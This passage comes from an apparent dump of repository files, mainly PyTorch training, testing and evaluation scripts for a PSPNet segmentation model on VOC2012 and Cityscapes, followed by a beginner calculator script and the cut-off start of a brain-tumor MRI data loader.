lr_poly(base_lr, iter, max_iter, power):\n return base_lr*((1-float(iter)/max_iter)**(power))\n\n\ndef get_1x_lr_params_NOscale(model):\n \"\"\"\n This generator returns all the parameters of the net except for \n the last classification layer. Note that for each batchnorm layer, \n requires_grad is set to False in deeplab_resnet.py, therefore this function does not return \n any batchnorm parameter\n \"\"\"\n b = []\n if torch.cuda.device_count() == 1:\n b.append(model.conv1)\n b.append(model.bn1)\n b.append(model.layer1)\n b.append(model.layer2)\n b.append(model.layer3)\n b.append(model.layer4)\n else:\n b.append(model.module.conv1)\n b.append(model.module.bn1)\n b.append(model.module.layer1)\n b.append(model.module.layer2)\n b.append(model.module.layer3)\n b.append(model.module.layer4)\n \n for i in range(len(b)):\n for j in b[i].modules():\n jj = 0\n for k in j.parameters():\n jj+=1\n if k.requires_grad:\n yield k\n\ndef get_10x_lr_params(model):\n \"\"\"\n This generator returns all the parameters for the last layer of the net,\n which does the classification of pixel into classes\n \"\"\"\n b = []\n if torch.cuda.device_count() == 1:\n b.append(model.pspmodule.parameters())\n b.append(model.main_classifier.parameters())\n else:\n b.append(model.module.pspmodule.parameters())\n b.append(model.module.main_classifier.parameters())\n\n for j in range(len(b)):\n for i in b[j]:\n yield i\n \n \ndef adjust_learning_rate(optimizer, i_iter, max_iter):\n \"\"\"Sets the learning rate to the initial LR divided by 5 at 60th, 120th and 160th epochs\"\"\"\n lr = lr_poly(args.learning_rate, i_iter, max_iter, args.power)\n optimizer.param_groups[0]['lr'] = lr\n optimizer.param_groups[1]['lr'] = lr * 10\n return lr\n\ndef netParams(model):\n '''\n Computing total network parameters\n Args:\n model: model\n return: total network parameters\n '''\n total_paramters = 0\n for parameter in model.parameters():\n i = len(parameter.size())\n #print(parameter.size())\n p = 1\n for j in range(i):\n p *= parameter.size(j)\n total_paramters += p\n\n return total_paramters\n\ndef main():\n \n \n print(\"=====> Configure dataset and pretrained model\")\n configure_dataset_init_model(args)\n print(args)\n\n print(\" current dataset: \", args.dataset)\n print(\" init model: \", args.restore_from)\n print(\"=====> Set GPU for training\")\n if args.cuda:\n print(\"====> Use gpu id: '{}'\".format(args.gpus))\n os.environ[\"CUDA_VISIBLE_DEVICES\"] = args.gpus\n if not torch.cuda.is_available():\n raise Exception(\"No GPU found or Wrong gpu id, please run without --cuda\")\n \n print(\"=====> Random Seed: \", args.random_seed)\n torch.manual_seed(args.random_seed)\n if args.cuda:\n torch.cuda.manual_seed(args.random_seed) \n\n h, w = map(int, args.input_size.split(','))\n input_size = (h, w)\n\n cudnn.enabled = True\n\n print(\"=====> Building network\")\n model = PSPNet(num_classes=args.num_classes)\n # For a small batch size, it is better to keep \n # the statistics of the BN layers (running means and variances)\n # frozen, and to not update the values provided by the pre-trained model. \n # If is_training=True, the statistics will be updated during the training.\n # Note that is_training=False still updates BN parameters gamma (scale) and beta (offset)\n # if they are presented in var_list of the optimiser definition.\n\n \n print(\"=====> Loading init weights, pretrained COCO for VOC2012, and pretrained Coarse cityscapes for cityscapes\")\n saved_state_dict = torch.load(args.restore_from)\n new_params = model.state_dict().copy()\n for i in saved_state_dict:\n #Scale.layer5.conv2d_list.3.weight\n #print(saved_state_dict[i].size())\n i_parts = i.split('.')\n #print('i_parts: ', i_parts)\n if not i_parts[1]=='layer5': #init model pretrained on COCO, class name=21, layer5 is ASPP\n new_params['.'.join(i_parts[1:])] = saved_state_dict[i]\n #print('copy {}'.format('.'.join(i_parts[1:])))\n model.load_state_dict(new_params)\n\n \n if args.cuda:\n if torch.cuda.device_count()>1:\n print(\"torch.cuda.device_count()=\",torch.cuda.device_count())\n model = torch.nn.DataParallel(model).cuda() #multi-card data parallel\n else:\n print(\"single GPU for training\")\n model = model.cuda() #1-card data parallel\n start_epoch=0\n \n print(\"=====> Whether resuming from a checkpoint, for continuing training\")\n if args.resume:\n if os.path.isfile(args.resume):\n print(\"=> loading checkpoint '{}'\".format(args.resume))\n checkpoint = torch.load(args.resume)\n start_epoch = checkpoint[\"epoch\"] \n model.load_state_dict(checkpoint[\"model\"])\n else:\n print(\"=> no checkpoint found at '{}'\".format(args.resume))\n\n\n model.train()\n cudnn.benchmark = True\n\n if not os.path.exists(args.snapshot_dir):\n os.makedirs(args.snapshot_dir)\n\n print('=====> Computing network parameters')\n total_paramters = netParams(model)\n print('Total network parameters: ' + str(total_paramters))\n \n print(\"=====> Preparing training data\")\n if args.dataset == 'voc12':\n trainloader = data.DataLoader(VOCDataSet(args.data_dir, args.data_list, max_iters=None, crop_size=input_size, \n scale=args.random_scale, mirror=args.random_mirror, mean=args.img_mean), \n batch_size= args.batch_size, shuffle=True, num_workers=0, pin_memory=True, drop_last=True)\n elif args.dataset == 'cityscapes':\n trainloader = data.DataLoader(CityscapesDataSet(args.data_dir, args.data_list, max_iters=None, crop_size=input_size, \n scale=args.random_scale, mirror=args.random_mirror, mean=args.img_mean), \n batch_size = args.batch_size, shuffle=True, num_workers=0, pin_memory=True, drop_last=True)\n\n else:\n print(\"dataset error\")\n\n optimizer = optim.SGD([{'params': get_1x_lr_params_NOscale(model), 'lr': args.learning_rate }, \n {'params': get_10x_lr_params(model), 'lr': 10*args.learning_rate}], \n lr=args.learning_rate, momentum=args.momentum,weight_decay=args.weight_decay)\n optimizer.zero_grad()\n\n\n \n logFileLoc = args.snapshot_dir + args.logFile\n if os.path.isfile(logFileLoc):\n logger = open(logFileLoc, 'a')\n else:\n logger = open(logFileLoc, 'w')\n logger.write(\"Parameters: %s\" % (str(total_paramters)))\n logger.write(\"\\n%s\\t\\t%s\" % ('iter', 'Loss(train)\\n'))\n logger.flush()\n\n print(\"=====> Begin to train\")\n train_len=len(trainloader)\n print(\" iteration numbers of per epoch: \", train_len)\n print(\" epoch num: \", args.maxEpoches)\n print(\" max iteration: \", args.maxEpoches*train_len)\n for epoch in range(start_epoch, int(args.maxEpoches)):\n \n for i_iter, batch in enumerate(trainloader,0): #i_iter from 0 to len-1\n #print(\"i_iter=\", i_iter, \"epoch=\", epoch)\n images, labels, _, _ = batch\n images = Variable(images).cuda()\n\n optimizer.zero_grad()\n lr = adjust_learning_rate(optimizer, i_iter+epoch*train_len, \n max_iter = args.maxEpoches * train_len)\n pred = model(images)\n print(\"model output size: \", pred.size())\n loss = loss_calc(pred, labels)\n loss.backward()\n optimizer.step()\n \n print(\"===> Epoch[{}]({}/{}): Loss: {:.10f} lr: {:.5f}\".format(epoch, i_iter, train_len, loss.data[0], lr))\n logger.write(\"Epoch[{}]({}/{}): Loss: {:.10f} lr: {:.5f}\\n\".format(epoch, i_iter, train_len, loss.data[0], lr))\n logger.flush()\n \n print(\"=====> saving model\")\n state={\"epoch\": epoch+1, \"model\": model.state_dict()}\n torch.save(state, osp.join(args.snapshot_dir, 'psp_'+str(args.dataset)+\"_\"+str(epoch)+'.pth'))\n\n\n end = timeit.default_timer()\n print( float(end-start)/3600, 'h')\n logger.write(\"total training time: {:.2f} h\\n\".format(float(end-start)/3600))\n logger.close()\n\n\nif __name__ == '__main__':\n main()\n" }, { "alpha_fraction": 0.621669352054596, "alphanum_fraction": 0.645075798034668, "avg_line_length": 43.110389709472656, "blob_id": "1c12c6d670f8a5058639269cafddb19b12e2f034", "content_id": "9410a9d923953fe91a391d1869b9100d70716c29", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 6793, "license_type": "no_license", "max_line_length": 135, "num_lines": 154, "path": "/test.py", "repo_name": "wutianyiRosun/PSPNet_PyTorch", "src_encoding": "UTF-8", "text": "import torch\nimport argparse\nimport scipy\nfrom scipy import ndimage\nimport numpy as np\nimport sys\nimport cv2\nfrom torch.autograd import Variable\nimport torchvision.models as models\nimport torch.nn.functional as F\nfrom torch.utils import data\nfrom psp.model import PSPNet\nfrom psp.voc12_datasets import VOCDataTestSet\nfrom psp.cityscapes_datasets import CityscapesTestDataSet\nfrom collections import OrderedDict\nfrom utils.colorize_mask import cityscapes_colorize_mask, VOCColorize\nimport os\nfrom PIL import Image\n\nimport matplotlib.pyplot as plt\nimport torch.nn as nn\n\n\ndef get_arguments():\n \"\"\"Parse all the arguments provided from the CLI.\n \n Returns:\n A list of parsed arguments.\n \"\"\"\n parser = argparse.ArgumentParser(description=\"PSPnet\")\n parser.add_argument(\"--dataset\", type=str, default='cityscapes',\n help=\"voc12, cityscapes, or pascal-context\")\n\n # GPU configuration\n parser.add_argument(\"--cuda\", default=True, help=\"Run on CPU or GPU\")\n parser.add_argument(\"--gpus\", type=str, default=\"3\",\n help=\"choose gpu device.\")\n return parser.parse_args()\n\ndef configure_dataset_model(args):\n if args.dataset == 'voc12':\n args.data_dir ='/home/wty/AllDataSet/VOC2012' #Path to the directory containing the PASCAL VOC dataset\n args.data_list = './dataset/list/VOC2012/test.txt' #Path to the file listing the images in the dataset\n args.img_mean = np.array((104.00698793,116.66876762,122.67891434), dtype=np.float32) \n #RBG mean, first subtract mean and then change to BGR\n args.ignore_label = 255 #The index of the label to ignore during the training\n args.num_classes = 21 #Number of classes to predict (including background)\n args.restore_from = './snapshots/voc12/psp_voc12_14.pth' #Where restore model parameters from\n args.save_segimage = True\n args.seg_save_dir = \"./result/test/VOC2012\"\n args.corp_size =(505, 505)\n \n elif args.dataset == 'cityscapes':\n args.data_dir ='/home/wty/AllDataSet/CityScapes' #Path to the directory containing the PASCAL VOC dataset\n args.data_list = './dataset/list/Cityscapes/cityscapes_test_list.txt' #Path to the file listing the images in the dataset\n args.img_mean = np.array((73.15835921, 82.90891754, 72.39239876), dtype=np.float32)\n #RBG mean, first subtract mean and then change to BGR\n args.ignore_label = 255 #The index of the label to ignore during the training\n args.f_scale = 1 #resize image, and Unsample model output to original image size, label keeps\n args.num_classes = 19 #Number of classes to predict (including background)\n args.restore_from = './snapshots/cityscapes/psp_cityscapes_59.pth' #Where restore model parameters from\n args.save_segimage = True\n args.seg_save_dir = \"./result/test/Cityscapes\"\n else:\n print(\"dataset error\")\n\ndef convert_state_dict(state_dict):\n \"\"\"Converts a state dict saved from a dataParallel module to normal \n module state_dict inplace\n :param state_dict is the loaded DataParallel model_state\n You probably saved the model using nn.DataParallel, which stores the model in module, and now you are trying to load it \n without DataParallel. You can either add a nn.DataParallel temporarily in your network for loading purposes, or you can \n load the weights file, create a new ordered dict without the module prefix, and load it back \n \"\"\"\n state_dict_new = OrderedDict()\n #print(type(state_dict))\n for k, v in state_dict.items():\n #print(k)\n name = k[7:] # remove the prefix module.\n # My heart is borken, the pytorch have no ability to do with the problem.\n state_dict_new[name] = v\n return state_dict_new\n\n\ndef main():\n args = get_arguments()\n print(\"=====> Configure dataset and model\")\n configure_dataset_model(args)\n print(args)\n\n print(\"=====> Set GPU for training\")\n if args.cuda:\n print(\"====> Use gpu id: '{}'\".format(args.gpus))\n os.environ[\"CUDA_VISIBLE_DEVICES\"] = args.gpus\n if not torch.cuda.is_available():\n raise Exception(\"No GPU found or Wrong gpu id, please run without --cuda\")\n model = PSPNet(num_classes=args.num_classes)\n \n saved_state_dict = torch.load(args.restore_from)\n model.load_state_dict( convert_state_dict(saved_state_dict[\"model\"]) )\n\n model.eval()\n model.cuda()\n if args.dataset == 'voc12':\n testloader = data.DataLoader(VOCDataTestSet(args.data_dir, args.data_list, crop_size=(505, 505),mean= args.img_mean), \n batch_size=1, shuffle=False, pin_memory=True)\n interp = nn.Upsample(size=(505, 505), mode='bilinear')\n voc_colorize = VOCColorize()\n elif args.dataset == 'cityscapes':\n testloader = data.DataLoader(CityscapesTestDataSet(args.data_dir, args.data_list, f_scale= args.f_scale, mean= args.img_mean), \n batch_size=1, shuffle=False, pin_memory=True) # f_sale, meaning resize image at f_scale as input\n interp = nn.Upsample(size=(1024, 2048), mode='bilinear') #size = (h,w)\n else:\n print(\"dataset error\")\n\n data_list = []\n\n if args.save_segimage:\n if not os.path.exists(args.seg_save_dir):\n os.makedirs(args.seg_save_dir)\n print(\"======> test set size:\", len(testloader))\n for index, batch in enumerate(testloader):\n print('%d processd'%(index))\n image, size, name = batch\n size = size[0].numpy()\n output = model(Variable(image, volatile=True).cuda())\n\n output = interp(output).cpu().data[0].numpy()\n\n if args.dataset == 'voc12':\n print(output.shape)\n print(size)\n output = output[:,:size[0],:size[1]]\n output = output.transpose(1,2,0)\n output = np.asarray(np.argmax(output, axis=2), dtype=np.uint8)\n if args.save_segimage:\n seg_filename = os.path.join(args.seg_save_dir, '{}.png'.format(name[0]))\n color_file = Image.fromarray(voc_colorize(output).transpose(1, 2, 0), 'RGB')\n color_file.save(seg_filename)\n\n elif args.dataset == 'cityscapes':\n output = output.transpose(1,2,0)\n output = np.asarray(np.argmax(output, axis=2), dtype=np.uint8)\n if args.save_segimage:\n output_color = cityscapes_colorize_mask(output)\n output = Image.fromarray(output)\n output.save('%s/%s.png'% (args.seg_save_dir, name[0]))\n output_color.save('%s/%s_color.png'%(args.seg_save_dir, name[0]))\n else:\n print(\"dataset error\")\n\n\nif __name__ == '__main__':\n main()\n" }, { "alpha_fraction": 0.6074672341346741, "alphanum_fraction": 0.6367305517196655, "avg_line_length": 33.17241287231445, "blob_id": "d91c39b3cd7b363bfe281249e87413bd1e0ac01d", "content_id": "6fdc7383f5f6abc37423a2f44e6f3e1334a5ee96", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 991, "license_type": "no_license", "max_line_length": 227, "num_lines": 29, "path": "/README.md", "repo_name": "wutianyiRosun/PSPNet_PyTorch", "src_encoding": "UTF-8", "text": "# PSPNet_PyTorch\nAn implementation of PSPNet: [Pyramid Scene Parsing Network](http://arxiv.org/abs/1612.01105), CVPR2017\n\n### Training\n\nYou can download pretrained model on COCO [here](https://pan.baidu.com/s/1iLGtw1byy0rIIZJ5MHrpOg) for training on VOC2012 and pretrained model [here](https://pan.baidu.com/s/1vTdzYcTnfJ2XT2996JZedg) for training on Cityscapes.\n\n```\nusage: train.py [-h] [--is-training] [--learning-rate LEARNING_RATE]\n [--weight-decay WEIGHT_DECAY] [--momentum MOMENTUM]\n [--power POWER] [--dataset DATASET] [--random-mirror]\n [--random-scale] [--not-restore-last]\n [--random-seed RANDOM_SEED] [--logFile LOGFILE] [--cuda CUDA]\n [--gpus GPUS]\n\n\nexmaple: train.py --dataset voc12\n```\n### Evaluation (on val set)\n\n```\nusage: evaluate.py [-h] [--dataset DATASET] [--cuda CUDA] [--gpus GPUS]\n\n```\n\n### Testing (on test set)\n```\nusage: test.py [-h] [--dataset DATASET] [--cuda CUDA] [--gpus GPUS]\n```\n" }, { "alpha_fraction": 0.7142857313156128, "alphanum_fraction": 0.7142857313156128, "avg_line_length": 41, "blob_id": "01b2b4b0bcc59ad796b63f825a39be818cca0fea", "content_id": "caf3eb6eb39fdfa590661e5ae8e41aa4469f3295", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 42, "license_type": "no_license", "max_line_length": 41, "num_lines": 1, "path": "/dataset/list/Cityscapes/README.md", "repo_name": "wutianyiRosun/PSPNet_PyTorch", "src_encoding": "UTF-8", "text": ".txt file for train, train_val, val, test\n" }, { "alpha_fraction": 0.5827134847640991, "alphanum_fraction": 0.6166579127311707, "avg_line_length": 41.61160659790039, "blob_id": "58a380b36ae82c7125fa6faf340eecdb19ed002d", "content_id": "ee31b92d81d088434b76df4126a7e422c39f7a2e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 9545, "license_type": "no_license", "max_line_length": 133, "num_lines": 224, "path": "/evaluate.py", "repo_name": "wutianyiRosun/PSPNet_PyTorch", "src_encoding": "UTF-8", "text": "import torch\nimport argparse\nimport scipy\nfrom scipy import ndimage\nimport numpy as np\nimport sys\nimport cv2\nfrom torch.autograd import Variable\nimport torchvision.models as models\nimport torch.nn.functional as F\nfrom torch.utils import data\nfrom psp.model import PSPNet\nfrom psp.voc12_datasets import VOCDataSet\nfrom psp.cityscapes_datasets import CityscapesValDataSet\nfrom collections import OrderedDict\nfrom utils.colorize_mask import cityscapes_colorize_mask, VOCColorize\nimport os\nfrom PIL import Image\n\nimport matplotlib.pyplot as plt\nimport torch.nn as nn\nimport time\n\n\ndef get_arguments():\n \"\"\"Parse all the arguments provided from the CLI.\n \n Returns:\n A list of parsed arguments.\n \"\"\"\n parser = argparse.ArgumentParser(description=\"PSPnet\")\n parser.add_argument(\"--dataset\", type=str, default='cityscapes',\n help=\"voc12, cityscapes, or pascal-context\")\n \n # GPU configuration\n parser.add_argument(\"--cuda\", default=True, help=\"Run on CPU or GPU\")\n parser.add_argument(\"--gpus\", type=str, default=\"3\",\n help=\"choose gpu device.\")\n return parser.parse_args()\n\ndef configure_dataset_model(args):\n if args.dataset == 'voc12':\n args.data_dir ='/home/wty/AllDataSet/VOC2012' #Path to the directory containing the PASCAL VOC dataset\n args.data_list = './dataset/list/VOC2012/val.txt' #Path to the file listing the images in the dataset\n args.img_mean = np.array((104.00698793,116.66876762,122.67891434), dtype=np.float32) \n #RBG mean, first subtract mean and then change to BGR\n args.ignore_label = 255 #The index of the label to ignore during the training\n args.num_classes = 21 #Number of classes to predict (including background)\n args.restore_from = './snapshots/voc12/psp_voc12_10.pth' #Where restore model parameters from\n args.save_segimage = True\n args.seg_save_dir = \"./result/val/VOC2012\"\n args.corp_size =(505, 505)\n \n elif args.dataset == 'cityscapes':\n args.data_dir ='/home/wty/AllDataSet/CityScapes' #Path to the directory containing the PASCAL VOC dataset\n args.data_list = './dataset/list/Cityscapes/cityscapes_val_list.txt' #Path to the file listing the images in the dataset\n args.img_mean = np.array((73.15835921, 82.90891754, 72.39239876), dtype=np.float32)\n #RBG mean, first subtract mean and then change to BGR\n args.ignore_label = 255 #The index of the label to ignore during the training\n args.num_classes = 19 #Number of classes to predict (including background)\n args.f_scale = 1 #resize image, and Unsample model output to original image size\n args.restore_from = './snapshots/cityscapes/psp_cityscapes_20.pth' #Where restore model parameters from\n #args.restore_from = './pretrained/resnet101_pretrained_for_cityscapes.pth' #Where restore model parameters from\n args.save_segimage = True\n args.seg_save_dir = \"./result/val/Cityscapes\"\n else:\n print(\"dataset error when configuring dataset and model\")\n\ndef convert_state_dict(state_dict):\n \"\"\"Converts a state dict saved from a dataParallel module to normal \n module state_dict inplace\n :param state_dict is the loaded DataParallel model_state\n You probably saved the model using nn.DataParallel, which stores the model in module, and now you are trying to load it \n without DataParallel. You can either add a nn.DataParallel temporarily in your network for loading purposes, or you can \n load the weights file, create a new ordered dict without the module prefix, and load it back \n \"\"\"\n state_dict_new = OrderedDict()\n #print(type(state_dict))\n for k, v in state_dict.items():\n #print(k)\n name = k[7:] # remove the prefix module.\n # My heart is borken, the pytorch have no ability to do with the problem.\n state_dict_new[name] = v\n return state_dict_new\n\ndef get_iou(data_list, class_num, save_path=None):\n from multiprocessing import Pool \n from psp.metric import ConfusionMatrix\n\n ConfM = ConfusionMatrix(class_num)\n f = ConfM.generateM\n pool = Pool() \n m_list = pool.map(f, data_list)\n pool.close() \n pool.join() \n \n for m in m_list:\n ConfM.addM(m)\n\n aveJ, j_list, M = ConfM.jaccard()\n print('meanIOU: ' + str(aveJ) + '\\n')\n if save_path:\n with open(save_path, 'w') as f:\n f.write('meanIOU: ' + str(aveJ) + '\\n')\n f.write(str(j_list)+'\\n')\n f.write(str(M)+'\\n')\n\ndef show_all(gt, pred):\n import matplotlib.pyplot as plt\n from matplotlib import colors\n from mpl_toolkits.axes_grid1 import make_axes_locatable\n\n fig, axes = plt.subplots(1, 2)\n ax1, ax2 = axes\n\n classes = np.array(('background', # always index 0\n 'aeroplane', 'bicycle', 'bird', 'boat',\n 'bottle', 'bus', 'car', 'cat', 'chair',\n 'cow', 'diningtable', 'dog', 'horse',\n 'motorbike', 'person', 'pottedplant',\n 'sheep', 'sofa', 'train', 'tvmonitor'))\n colormap = [(0,0,0),(0.5,0,0),(0,0.5,0),(0.5,0.5,0),(0,0,0.5),(0.5,0,0.5),(0,0.5,0.5), \n (0.5,0.5,0.5),(0.25,0,0),(0.75,0,0),(0.25,0.5,0),(0.75,0.5,0),(0.25,0,0.5), \n (0.75,0,0.5),(0.25,0.5,0.5),(0.75,0.5,0.5),(0,0.25,0),(0.5,0.25,0),(0,0.75,0), \n (0.5,0.75,0),(0,0.25,0.5)]\n cmap = colors.ListedColormap(colormap)\n bounds=[0,1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21]\n norm = colors.BoundaryNorm(bounds, cmap.N)\n\n ax1.set_title('gt')\n ax1.imshow(gt, cmap=cmap, norm=norm)\n\n ax2.set_title('pred')\n ax2.imshow(pred, cmap=cmap, norm=norm)\n\n plt.show()\n\ndef main():\n args = get_arguments()\n print(\"=====> Configure dataset and model\")\n configure_dataset_model(args)\n print(args)\n\n print(\"=====> Set GPU for training\")\n if args.cuda:\n print(\"====> Use gpu id: '{}'\".format(args.gpus))\n os.environ[\"CUDA_VISIBLE_DEVICES\"] = args.gpus\n if not torch.cuda.is_available():\n raise Exception(\"No GPU found or Wrong gpu id, please run without --cuda\")\n \n model = PSPNet(num_classes=args.num_classes)\n \n saved_state_dict = torch.load(args.restore_from)\n if args.dataset == 'voc12':\n model.load_state_dict( convert_state_dict(saved_state_dict[\"model\"]) )\n elif args.dataset == 'cityscapes':\n #model.load_state_dict(saved_state_dict[\"model\"])\n model.load_state_dict( convert_state_dict(saved_state_dict[\"model\"]) )\n else:\n print(\"dataset error when loading model file\")\n\n model.eval()\n model.cuda()\n if args.dataset == 'voc12':\n testloader = data.DataLoader(VOCDataSet(args.data_dir, args.data_list, crop_size=(505, 505), \n mean= args.img_mean, scale=False, mirror=False), \n batch_size=1, shuffle=False, pin_memory=True)\n interp = nn.Upsample(size=(505, 505), mode='bilinear')\n voc_colorize = VOCColorize()\n elif args.dataset == 'cityscapes':\n testloader = data.DataLoader(CityscapesValDataSet(args.data_dir, args.data_list, f_scale=args.f_scale, mean= args.img_mean), \n batch_size=1, shuffle=False, pin_memory=True) # f_sale, meaning resize image at f_scale as input\n interp = nn.Upsample(size=(1024, 2048), mode='bilinear') #size = (h,w)\n else:\n print(\"dataset error when configure DataLoader\")\n\n data_list = []\n\n if args.save_segimage:\n if not os.path.exists(args.seg_save_dir):\n os.makedirs(args.seg_save_dir)\n\n for index, batch in enumerate(testloader):\n image, label, size, name = batch\n #print(\"label.size:\", label.size())\n #print(\"model input image size:\", image.size())\n size = size[0].numpy()\n start_time = time.time()\n output = model(Variable(image, volatile=True).cuda())\n\n output = interp(output).cpu().data[0].numpy()\n\n time_taken = time.time() - start_time;\n print('%d processd, time: %.3f'%(index, time_taken))\n\n if args.dataset == 'voc12':\n output = output[:,:size[0],:size[1]]\n gt = np.asarray(label[0].numpy()[:size[0],:size[1]], dtype=np.int)\n output = output.transpose(1,2,0)\n output = np.asarray(np.argmax(output, axis=2), dtype=np.int)\n data_list.append([gt.flatten(), output.flatten()])\n if args.save_segimage:\n seg_filename = os.path.join(args.seg_save_dir, '{}.png'.format(name[0]))\n color_file = Image.fromarray(voc_colorize(output).transpose(1, 2, 0), 'RGB')\n color_file.save(seg_filename)\n\n elif args.dataset == 'cityscapes':\n gt = np.asarray(label[0].numpy(), dtype=np.int)\n output = output.transpose(1,2,0)\n output = np.asarray(np.argmax(output, axis=2), dtype=np.uint8)\n data_list.append([gt.flatten(), output.flatten()])\n if args.save_segimage:\n output_color = cityscapes_colorize_mask(output)\n output = Image.fromarray(output)\n output.save('%s/%s.jpg'% (args.seg_save_dir, name[0]))\n output_color.save('%s/%s_color.png'%(args.seg_save_dir, name[0]))\n else:\n print(\"dataset error\")\n\n get_iou(data_list, args.num_classes)\n\n\nif __name__ == '__main__':\n main()\n" }, { "alpha_fraction": 0.719298243522644, "alphanum_fraction": 0.719298243522644, "avg_line_length": 56, "blob_id": "c4a44a650ca170d6f04f157c2db98123a09d79cf", "content_id": "cc1855e5502d00beeaa90b050b9a8afeef30530b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 57, "license_type": "no_license", "max_line_length": 56, "num_lines": 1, "path": "/dataset/list/VOC2012/README.md", "repo_name": "wutianyiRosun/PSPNet_PyTorch", "src_encoding": "UTF-8", "text": ".txt file for train, train_aug, train_aug_val, val, test\n" }, { "alpha_fraction": 0.5126475691795349, "alphanum_fraction": 0.520236074924469, "avg_line_length": 25.35555648803711, "blob_id": "1a18515418a0a939122336f45af7a9bcaeaba319", "content_id": "761d6e191056d4dcdbe20e973e07212f25644dba", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1186, "license_type": "no_license", "max_line_length": 74, "num_lines": 45, "path": "/plot_curve.py", "repo_name": "wutianyiRosun/PSPNet_PyTorch", "src_encoding": "UTF-8", "text": "import os\nimport matplotlib.pyplot as plt\n\ndef loss_plot(loss_seq,lr_seq, path = 'Train_hist.png', model_name = ''):\n x = range(len(loss_seq))\n\n y1 = loss_seq\n y2 = lr_seq\n\n plt.plot(x, y1, label='loss')\n plt.plot(x, y2, label='lr')\n\n plt.xlabel('Iter')\n plt.ylabel('Loss')\n\n plt.legend(loc=4)\n plt.grid(True)\n plt.tight_layout()\n plt.savefig(path)\n\n #plt.close()\n print(\"finish\")\n plt.show()\n plt.close()\n\nif __name__ == '__main__':\n log_file = \"./snapshots/voc12/log.txt\"\n log_data_list = [item.strip() for item in open(log_file, 'r')]\n length = len(log_data_list)\n print(\"the number of records:\", length)\n\n loss_seq =[]\n lr_seq =[]\n for item in log_data_list:\n print( item.split())\n if len(item.split())==5 :\n if item.split()[3]==\"lr:\":\n _, _, loss_val,_, lr = item.split()\n loss_val = float(loss_val)\n lr = float(lr)\n loss_seq.append(loss_val)\n lr_seq.append(lr)\n print(\"loss_val:\", loss_val)\n print(\"lr:\", lr)\n loss_plot(loss_seq, lr_seq, path = 'Train_hist.png', model_name = '')\n" } ]
9
pydeveloperashish/Membership-Materials
https://github.com/pydeveloperashish/Membership-Materials
b6dd799ca5072417ac8caf6c22b7f299126f64d8
5c012b2b2c9d9ccd9242aa32370f0e5c9d29d1db
5cd85595927d619d9e48561718b44782090333de
refs/heads/main
2023-04-09T02:05:15.480360
2021-04-25T09:56:27
2021-04-25T09:56:27
354,558,038
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.5382165312767029, "alphanum_fraction": 0.5605095624923706, "avg_line_length": 17.038461685180664, "blob_id": "32a6da64d59d69df95744efb11d85deae515e23b", "content_id": "c16bf5bcf5aae3761e05a2e5b15e1c24e53c0079", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 942, "license_type": "no_license", "max_line_length": 104, "num_lines": 52, "path": "/Calculater.py", "repo_name": "pydeveloperashish/Membership-Materials", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n# coding: utf-8\n\n# In[3]:\n\n\nx=int(input(\"Enter the value of X: \"))\ny=int(input(\"Enter the value of y: \"))\n\nfunction=int(input(\"press 1 for add, press 2 for sub, press 3 for mult, press 4 for div: \"))\n\nchoices=[1,2,3,4]\n\ndef add(x,y):\n return print(x+y)\n\ndef sub(x,y):\n return print(x-y)\n\ndef mult(x,y):\n return print(x*y)\n\ndef div(x,y):\n return print(x/y)\n \nif function not in choices:\n for i in range(1,4):\n if function not in choices:\n print(\"invalid number\")\n function=int(input(\"press 1 for add, press 2 for sub, press 3 for mult, press 4 for div: \"))\n if i==3 and function not in choices:\n print(\"You have reached limit of invalid numbers\")\n else:\n break\n \nif function==1:\n add(x,y)\n \nelif function==2:\n sub(x,y)\n \nelif function==3:\n mult(x,y)\n \nelif function==4:\n div(x,y)\n \n\n \n\n\n# In[ ]:\n\n\n\n\n" } ]
1
Yi-YunSung/109-2MachineLearning
https://github.com/Yi-YunSung/109-2MachineLearning
5ce9e7988478a9577379acedb56e232e0306f81b
3801d52b51d2f3a52dc7c7d1cbc0f58a6577d2b7
320e5f52eab0ef2ee6975b2fa0c63404e0dcebf3
refs/heads/main
2023-06-06T12:06:25.372380
2021-06-27T15:24:26
2021-06-27T15:24:26
350,223,333
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.6164073348045349, "alphanum_fraction": 0.6679256558418274, "avg_line_length": 39.89240646362305, "blob_id": "2c12e7b6fafebfd40bf330095181fea534b131d2", "content_id": "00c665ffbf7e66f14d42d76092d745fed3549bcd", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 6753, "license_type": "no_license", "max_line_length": 101, "num_lines": 158, "path": "/hw4_group6/hw4_group6_braintumor.py", "repo_name": "Yi-YunSung/109-2MachineLearning", "src_encoding": "UTF-8", "text": "import os\r\nimport pandas as pd\r\nfrom tqdm import tqdm\r\nimport numpy as np\r\nimport glob\r\nimport SimpleITK as sitk\r\nfrom scipy import ndimage\r\nimport matplotlib.pyplot as plt\r\n\r\n#讀訓練檔案\r\ntrain_image_path = 'C:/Users/User/Downloads/train_image'\r\ntrain_image_filelist = os.listdir(train_image_path)\r\ntrain_label_path = 'C:/Users/User/Downloads/train_label'\r\ntrain_label_filelist = os.listdir(train_label_path)\r\n\r\n#讀取一層數據\r\nori_data = sitk.ReadImage(os.path.join(train_image_path, train_image_filelist[1]))\r\ndata1 = sitk.GetArrayFromImage(ori_data)#讀取數據陣列\r\n#打印数据name、shape、某一个位置的元素的值(z,y,x)\r\nprint(train_image_filelist[1], data1.shape, data1[38,255,255])\r\nplt.imshow(data1[60,:,:]) # 对第85张slice可视化\r\nprint(plt.show())\r\n\r\n#讀測試檔案\r\ntest_image_path = 'C:/Users/User/Downloads/test_image'\r\ntest_image_filelist = os.listdir(test_image_path)\r\n\r\n\r\n\r\n#訓練檔案轉換\r\ndef load_train_data(path):\r\n train_image_dir = sorted(train_image_filelist)\r\n data = []\r\n for p in tqdm(train_image_dir):\r\n 